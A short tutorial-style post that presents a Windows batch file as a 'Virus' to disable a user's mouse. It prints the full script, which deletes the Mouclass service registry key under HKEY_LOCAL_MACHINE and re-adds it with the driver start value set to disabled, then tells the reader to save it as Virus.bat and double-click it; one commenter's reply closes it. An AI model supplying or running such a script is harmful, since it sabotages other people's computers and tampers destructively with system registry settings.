Today, I am going to show you to Disable Computer Mouse. This trick is possible with a Batch file. This simple trick will disable user’s mouse with .bat file easily. This trick will work as a Virus.
Let’s begin……..
How to make a Virus to Disable Mouse ?
Step 1. Open Notepad and Paste code given below…
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————–
Step 2. Now save this file as Virus.bat (File extension should be .bat but file name can be anything)
Step 3. Now double click on this .bat file.
you have done.
nice but i can’t do this!